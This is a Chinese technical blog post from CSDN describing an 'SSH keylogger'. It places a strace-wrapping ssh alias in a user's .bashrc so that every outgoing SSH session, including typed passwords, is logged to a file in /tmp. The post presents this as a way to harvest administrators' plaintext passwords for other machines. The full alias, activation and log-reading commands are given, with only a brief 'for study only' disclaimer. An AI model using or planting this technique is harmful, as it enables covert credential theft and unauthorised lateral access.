SSH Keylogger密码抓取

最新推荐文章于 2023-03-28 15:43:00 发布
最新推荐文章于 2023-03-28 15:43:00 发布
阅读量1k 收藏 3
点赞数
文章标签: ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/127890201
版权

简介

SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码

主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。

Strace

strace命令是一个集诊断、调试、统计于一体的工具,常用来跟踪进程执行时的系统调用和所接收的信号,可以用它来监控用户空间进程和内核的交互。

参数:

-c 统计每一系统调用的所执行的时间,次数和出错的次数等.

-d 输出strace关于标准错误的调试信息.

-f 跟踪由fork调用所产生的子进程.

-i 输出系统调用的入口指针.

-q 禁止输出关于脱离的消息.

-r 打印出相对时间关于,,每一个系统调用.

-t 在输出中的每一行前加上时间信息.

-T 显示每一调用所耗的时间.

-e expr 指定一个表达式,用来控制如何跟踪.格式:[qualifier=][!]value1[,value2]

-e trace=process 只跟踪有关进程控制的系统调用.

-e trace=network 跟踪与网络有关的所有系统调用.

-e strace=signal 跟踪所有与系统信号有关的系统调用.

-e trace=ipc 跟踪所有与进程通讯有关的系统调用.

-e abbrev=set 设定strace输出的系统调用的结果集.-v 等于abbrev=none.默认为abbrev=all.

-e raw=set 将指定的系统调用的参数以十六进制显示.

-o filename 将strace的输出写入文件filename

-p pid 跟踪指定的进程pid.

-s strsize 指定输出的字符串的最大长度.默认为32.文件名一直全部输出.

-u username 以username的UID和GID执行被跟踪的命令

SSH Keylogger

首先确保Linux主机已经安装strace工具并且能够正常使用

编辑用户家目录文件夹中的一个隐藏文件 '.bashrc' 并添加如下代码

vi .bashrc

#添加

alias ssh='strace -o /tmp/ssh-`date "+%m-%d-%H-%M"`.log -e read,write -s200 ssh'

#%m  表示月

#%d   表示日

#%H  表示小时

%M    表示分钟

运行命令 'source .bashrc' 是配置生效

source .bashrc

source命令用于重新执行修改的初始化文件使之立即生效,而不必注销并重新登录

'.bashrc' 文件就相当于 shell 的配置文件

Linux 系统中有很多 shell,包括bash,sh,zsh,dash等,不管哪种 shell 都会有一个 .bashrc 的隐藏文件,主要保存个人的一些个性化设置,如命令别名、路径等

然后再尝试使用ssh命令登录到其他的用户

 

则会在将交互时的所有信息保存在 /tmp 目录下的一个文件中,可以自己指定生成的文件路径

cat /tmp/ssh-11-16-06-05.log

终端中输入密码时不可见,但是输入的密码键盘记录会保存在文件当中,终端中的所有显示同样会保存在文件当中。

但是好像只能在当前用户的终端进行ssh命令才会记录相关信息,不在用户的终端中进行正常的ssh连接则不会记录相关的信息。

声明

提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或间接损失由使用者自行承担。

结语

没有那么多天赋异禀,优秀的人总是努力地翻山越岭。

Cheng-Ling
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SSH秘钥登录配置与系统日志管理
weixin_64655821的博客
08-22 2141
SSH秘钥登录配置与系统日志管理
03、配置SSH远程登录
AI-Echo的博客
12-07 1797
一、SSH SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。telnet采用的是明文传输,抓包的话能看到密码SSH是在telnet上发展起来的,区别在于所有数据都是加密的,更安全。 传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。 这些服务程序的安全验证方式也是有其弱点的, 就是很容易受到“中间人”(man-in...
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 870
当前系统如果存在strace的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。这条命令的意思就是:首先alias是取一个叫ssh的别名,然后将登陆的密码日志就通过strace这个工具记录到tmp这个目录下并且以.sshpwd加上当前的日期时间为文件名的文件中。所以当我们执行ssh通过root去连接的时候,或者切换用户的时候,就会将密码记录到/tmp目录下的.sshpwd加上日期时间的日志里。
ssh key login
老发的记录本
12-22 624
ssh-keygen -t rsa
ssh爆破获取用户密码
qq_59423570的博客
08-23 3099
通过nmap扫描目标主机发现ssh版本为OpenSSH 5.3,有漏洞 漏洞影响版本(OpenSSH =< 8.3p1) 使用msfconsole 工具 search ssh #查找有关ssh的漏洞 找到并使用漏洞use auxiliary/scanner/ssh/ssh_login showoptions #查看此漏洞需要的配置信息 set RHOSTS #配置目标主机ip set USERNAME #设置用户...
Linux OpenSSH-9.0p1最新版升级步骤详细(附脚本)
热门推荐
wlc_1216的博客
06-10 3万+
目前基于最新的OpenSSH-9.0p1更新,测试环境为Centos7.x以上,其他版本请自测!
Wireshark 的使用
weixin_30681615的博客
07-15 104
Wireshark 默认无法查看 https, 需要设置一下 新建环境变量 SSLKEYLOGFILE, 值为一个想要保存 sshKey 的文件, 如新建一个空文件 D:\AppData\SshKey.log, 然后打开浏览器浏览几个 HTTPS 网页, 浏览器就会自动将私钥存储进去 打开 WireShark, 编辑 -> 首选项 -> Protocols -> SSL...
asm.zip_keylogger
09-24
键盘纪录,用汇编写成的,学习参考资料。键盘纪录,用汇编写成的,学习参考资料。
FX3样本_keylogger_
10-02
给发个发广告个风格风格风格咕咕咕咕咕咕过过过过过ff
keylog_delphi_keylogger_
10-04
delphi keylogger simple
keylogger_keylogger_windows_键盘记录_
10-03
golang实现键盘记录
KeyLog_keylogger_keyloggerdelphi_
10-01
delphi keylogger win 32
如何获取SSH秘钥
qq_38893512的博客
11-29 6732
获取SSH秘钥
用strace工具来解析ssh的登录密码
09-18 1818
首先要开ssh服务,查看一下。。root@unbuntu:/etc# ps -ef |grep sshroot 3996 1 0 13:51 ? 00:00:00 /usr/sbin/sshdroot 4463 3996 0 15:04 ? 00:00:00 sshd: nova [priv]sshd 44
操作系统权限维持(十四)之Linux系统- Strace监听SSH来源流量记录密码后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 1039
现在我们去/tmp/.ssh.log文件中查找密码,发现了之前我们输入的连接密码123456,(.ssh.log文件中由于记录的流量信息比较多,所以查找起密码来可能比较麻烦和费时间)之前有用别名的方式来抓取登陆其他机器时的密码、同样也可以利用strace来监听登陆本地的sshd流量。此时我们任何使用ssh登录或者切换用户的操作,密码都会被记录到/tmp/.ssh.log文件中。这里我们用ssh以root身份连接到本机,以模仿用户ssh远程连接时的场景。当我们执行完后会发现之前的窗口已经在抓取流量了。
使用systemtap抓取ssh登录的用户名和密码
weixin_34221112的博客
06-12 768
为什么80%的码农都做不了架构师?>>> ...
linux获取ssh键盘记录软件,通过SSH连接时,如何从主机键盘读取输入?
weixin_31813357的博客
05-08 485
我目前正在尝试模拟键盘的RFID读卡器。连接卡时,它将从卡中读取数据,然后根据配置模拟击键。我已将此设备连接到Raspberry Pi,并通过SSH连接到Raspberry Pi。显然,当读者现在模拟击键时,它们落在Pi的本地tty上(而不是在我的SSH会话中)。因此,我现在很难获得该输入。最终,我将编写一个软件来处理输入,但是出于调试和开发目的,在SSH会话中获取键盘输入将非常有帮助。我尝试了以...
linux下监控并实现记录ssh登录密码
2ed
12-27 2682
测试环境: Linux 2.6.32-754.25.1.el6.x86_64 CentOS release 6.10 (Final) 首先安装systemtap这个包 原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。 yum --releasever=6.4 update yum install -y ...
led-Opt.Bak
最新发布
05-21
毕设&课设&项目&实训- 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】: 适用于希望学习不同技术领域的小白或进阶学习者。 可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】: 有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 鼓励下载和使用,并欢迎大家互相学习,共同进步。
keylogger.py
07-28
很抱歉,我无法回答关于keylogger.py的问题。 #### 引用[.reference_title] - *1* [windows python keylogger](https://blog.csdn.net/cnbird2008/article/details/4419250)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值